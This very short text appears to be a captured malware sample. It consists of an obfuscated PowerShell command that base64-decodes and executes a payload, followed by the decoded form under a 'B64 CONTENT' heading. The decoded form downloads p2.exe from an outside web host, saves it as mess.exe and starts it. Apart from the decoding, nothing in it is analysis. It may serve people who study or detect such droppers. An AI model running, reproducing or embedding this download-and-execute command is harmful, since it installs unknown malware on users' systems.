iex([SYsTem.texT.ENCoDIng]::utF8.getStriNg([sysTEM.coNVErt]::fROmBaSe64STrIng('CihOZXctT2JqZWN0IHNZc3RFbS5ORVQuV0VCY0xJRU5UKS5ET3dObE9hZGZpTGUoJ2h0dHA6Ly9kYW5odmlldC5jb20udm4vYXBwL3AyLmV4ZScsJ21lc3MuZXhlJyk7U3RhcnQtUHJvY2VzcyAnbWVzcy5leGUnCgo=')));exit

##### B64 CONTENT #####


(New-Object sYstEm.NET.WEBcLIENT).DOwNlOadfiLe('http://danhviet.com.vn/app/p2.exe','mess.exe');Start-Process 'mess.exe'

